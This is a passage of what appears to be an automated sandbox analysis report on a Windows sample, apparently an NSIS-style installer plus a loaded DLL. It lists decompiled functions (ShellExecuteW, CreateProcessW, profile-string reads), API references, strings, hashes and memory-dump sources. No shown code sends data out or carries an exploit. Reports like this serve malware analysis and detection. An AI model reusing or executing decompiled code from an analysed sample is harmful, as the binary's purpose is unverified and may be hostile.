                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID: install
                                                                                                                                                    • API String ID: 571936431-801815929
                                                                                                                                                    • Opcode ID: 5d9e35fbe1641cb0497c4f69f50486bc3c055f5d23bdbfab2c067e403b05fa10
                                                                                                                                                    • Instruction ID: 127b89b43a82109a6a81c0ad7903d0430f4c9a90834b9b42219bf6e8251734ce
                                                                                                                                                    • Opcode Fuzzy Hash: 5d9e35fbe1641cb0497c4f69f50486bc3c055f5d23bdbfab2c067e403b05fa10
                                                                                                                                                    • Instruction Fuzzy Hash: E6319E71C04249EFCB10CFE8C541BEEBBF9AB0A314F209569E4156B380D7741A44CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E624360, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6243B6
                                                                                                                                                      • Part of subcall function 6E625860: _DebugHeapAllocator.LIBCPMTD ref: 6E6258B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID: ca%d$ignoreFailure
                                                                                                                                                    • API String ID: 571936431-755966023
                                                                                                                                                    • Opcode ID: 8570cffcb6439e7259305046f9f7ed88663942d2ef0246698d03a5142a525e40
                                                                                                                                                    • Instruction ID: d9db54108ef028fc7037f0753c4c48bfe922d43da7d03c082fa2143edcb71e10
                                                                                                                                                    • Opcode Fuzzy Hash: 8570cffcb6439e7259305046f9f7ed88663942d2ef0246698d03a5142a525e40
                                                                                                                                                    • Instruction Fuzzy Hash: CD2136B0D14209EFCB04CFD5D880BEEBBB8EB09314F104629E41567380D7796A45CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004048F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004048F8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x461dc8 != _t22) {
							 *0x461dc8 = _t22;
							E00406035(0x451d98, 0x47f000);
							E00405F7D(0x47f000, _t22);
							E0040141D(6);
							E00406035(0x47f000, 0x451d98);
						}
						L11:
						return CallWindowProcW( *0x441d58, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040487A(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DDB(0x413);
				return 0;
			}




                                                                                                                                                    0x00404904
                                                                                                                                                    0x00404929
                                                                                                                                                    0x00404949
                                                                                                                                                    0x0040494c
                                                                                                                                                    0x0040494f
                                                                                                                                                    0x00404966
                                                                                                                                                    0x0040496c
                                                                                                                                                    0x00404973
                                                                                                                                                    0x0040497a
                                                                                                                                                    0x00404981
                                                                                                                                                    0x00404986
                                                                                                                                                    0x0040498c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040499c
                                                                                                                                                    0x00404936
                                                                                                                                                    0x00404989
                                                                                                                                                    0x00404989
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404989
                                                                                                                                                    0x00404942
                                                                                                                                                    0x00404944
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404944
                                                                                                                                                    0x0040490a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404911
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004021B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                    			E004021B5() {
				void* __ebx;
				void* _t20;
				short* _t21;
				void* _t23;
				signed int _t24;
				void* _t28;

				_t26 = E0040145C(_t23, _t20);
				_t21 = E0040145C(_t23, 0x31);
				_t24 = E0040145C(_t23, 0x22);
				E0040145C(_t23, 0x15);
				E00404F9E(0xffffffec, 0x4100f0);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteW( *(_t28 - 0xc),  ~( *_t5 & 0x0000ffff) & _t26, _t21,  ~( *_t24 & 0x0000ffff) & _t24, 0x4d70b0,  *(_t28 - 0x20)) >= 0x21) {
					_push(_t24);
					_push(_t21);
					E004062CF(L"ExecShell: success (\"%s\": file:\"%s\" params:\"%s\")", _t26);
				} else {
					__eax = E004062CF(L"ExecShell: warning: error (\"%s\": file:\"%s\" params:\"%s\")=%d", __esi);
					 *((intOrPtr*)(_t28 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}









                                                                                                                                                    0x004021bd
                                                                                                                                                    0x004021c6
                                                                                                                                                    0x004021cf
                                                                                                                                                    0x004021d1
                                                                                                                                                    0x004021dd
                                                                                                                                                    0x004021ea
                                                                                                                                                    0x004021f9
                                                                                                                                                    0x0040220b
                                                                                                                                                    0x00402223
                                                                                                                                                    0x00402224
                                                                                                                                                    0x0040222b
                                                                                                                                                    0x0040220d
                                                                                                                                                    0x00402216
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,74B5EA30,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,74B5EA30,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                                    • Opcode ID: 15c68030ebc057a6bcbee2c0ec13fbcebe1f6febf3bc6cb13a7f0169c5a164a4
                                                                                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                    • Opcode Fuzzy Hash: 15c68030ebc057a6bcbee2c0ec13fbcebe1f6febf3bc6cb13a7f0169c5a164a4
                                                                                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E621650, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E62167F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: ftp$http
                                                                                                                                                    • API String ID: 2086788075-3806254278
                                                                                                                                                    • Opcode ID: ec0f3faa9ecdba62bb902067b9d442c745be8063ca9886d5732c4bce4f25e49c
                                                                                                                                                    • Instruction ID: 031f659b03ed464d82c49b4e6030bd3d9718746ab9f2ef1ff13a472c6b152e3a
                                                                                                                                                    • Opcode Fuzzy Hash: ec0f3faa9ecdba62bb902067b9d442c745be8063ca9886d5732c4bce4f25e49c
                                                                                                                                                    • Instruction Fuzzy Hash: DA012970904209EFDB10DF94CD40BAEBBB8FB05754F104629E825AB2C0EB75A6048FA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64C9D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E64C980: std::ios_base::good.LIBCPMTD ref: 6E64C99A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64CA05
                                                                                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E64CA16
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Affinity::operator!=AllocatorConcurrency::details::DebugHardwareHeapstd::ios_base::good
                                                                                                                                                    • String ID: /Qbn
                                                                                                                                                    • API String ID: 2939947980-1235902857
                                                                                                                                                    • Opcode ID: cfb789fcb1cb07a02b10310da731a07e451eaa78af75fba9aaef04d7f623a8b0
                                                                                                                                                    • Instruction ID: 549634be634fb784a7b8817c499ceb7c786a3ad9fa27e03f3d64b9be3f7d34e5
                                                                                                                                                    • Opcode Fuzzy Hash: cfb789fcb1cb07a02b10310da731a07e451eaa78af75fba9aaef04d7f623a8b0
                                                                                                                                                    • Instruction Fuzzy Hash: 5EF03CB1D14549EBCB04CFA4DD40BEEB7B8FB14714F104A29E426A77C1EB346A04CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                    • Opcode ID: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                    • Opcode Fuzzy Hash: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402797, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00402797() {
				short _t7;
				intOrPtr _t8;
				WCHAR* _t9;
				WCHAR* _t10;
				int _t15;
				void* _t21;
				WCHAR* _t24;
				void* _t26;

				_t7 =  *L"!N~"; // 0x4e0021
				 *(_t26 - 0x48) = _t7;
				_t8 =  *0x409590; // 0x7e
				 *((intOrPtr*)(_t26 - 0x44)) = _t8;
				_t9 = E0040145C(_t21, 1);
				_t10 = E0040145C(_t21, 0x12);
				GetPrivateProfileStringW(_t9, _t10, _t26 - 0x48, _t24, 0x2003, E0040145C(_t21, 0xffffffdd));
				_t15 = lstrcmpW(_t24, _t26 - 0x48);
				if(_t15 == 0) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
					 *_t24 = 0;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}











                                                                                                                                                    0x00402797
                                                                                                                                                    0x0040279c
                                                                                                                                                    0x0040279f
                                                                                                                                                    0x004027a6
                                                                                                                                                    0x004027a9
                                                                                                                                                    0x004027b2
                                                                                                                                                    0x004027cd
                                                                                                                                                    0x004027d8
                                                                                                                                                    0x004019e6
                                                                                                                                                    0x004019ee
                                                                                                                                                    0x004019f5
                                                                                                                                                    0x004019f5
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 004027CD
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                    • String ID: !N~
                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405C6B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405C6B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x461dd0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0, 0, 0, 0x461dd0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                    0x00405c85
                                                                                                                                                    0x00405c90
                                                                                                                                                    0x00405c98
                                                                                                                                                    0x00405c9d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405ca3
                                                                                                                                                    0x00405ca7

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004062CF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004062CF(WCHAR* _a4, char _a8) {

				 *0x46d220 = 0;
				wvsprintfW(0x46d220 + lstrlenW("RMDir: RemoveDirectory on Reboot("C:\Users\hardz\AppData\Local\Temp\nsqEF29.tmp\")") * 2, _a4,  &_a8);
				return E00406113( &_a8, 0);
			}



                                                                                                                                                    0x004062d6
                                                                                                                                                    0x004062f3
                                                                                                                                                    0x00406300

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    Strings
                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"), xrefs: 004062D1, 004062D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                    • String ID: RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\")
                                                                                                                                                    • API String ID: 3509786178-686887853
                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E638460, Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,?,?), ref: 6E6384EA
                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 6E638510
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6E63852D
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,?,?), ref: 6E63856A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                    • Opcode ID: df51287a177ace5db55e3d596d3b1f5a718c95bcefb26952c16a631b3f0d7bcc
                                                                                                                                                    • Instruction ID: 0df9b586ebc62743f883b503fbd91567c86b1d8fa801b665add424e2ed75f4b0
                                                                                                                                                    • Opcode Fuzzy Hash: df51287a177ace5db55e3d596d3b1f5a718c95bcefb26952c16a631b3f0d7bcc
                                                                                                                                                    • Instruction Fuzzy Hash: FB411BB4E00219AFDB44CFD8C894BEFBBB5BF49314F208548E515AB395D775AA40CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65A838, Relevance: 5.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,00000000,00000004,0000001C), ref: 6E65A8B3
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C,?), ref: 6E65A8C6
                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 6E65A8CF
                                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 6E65A8EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
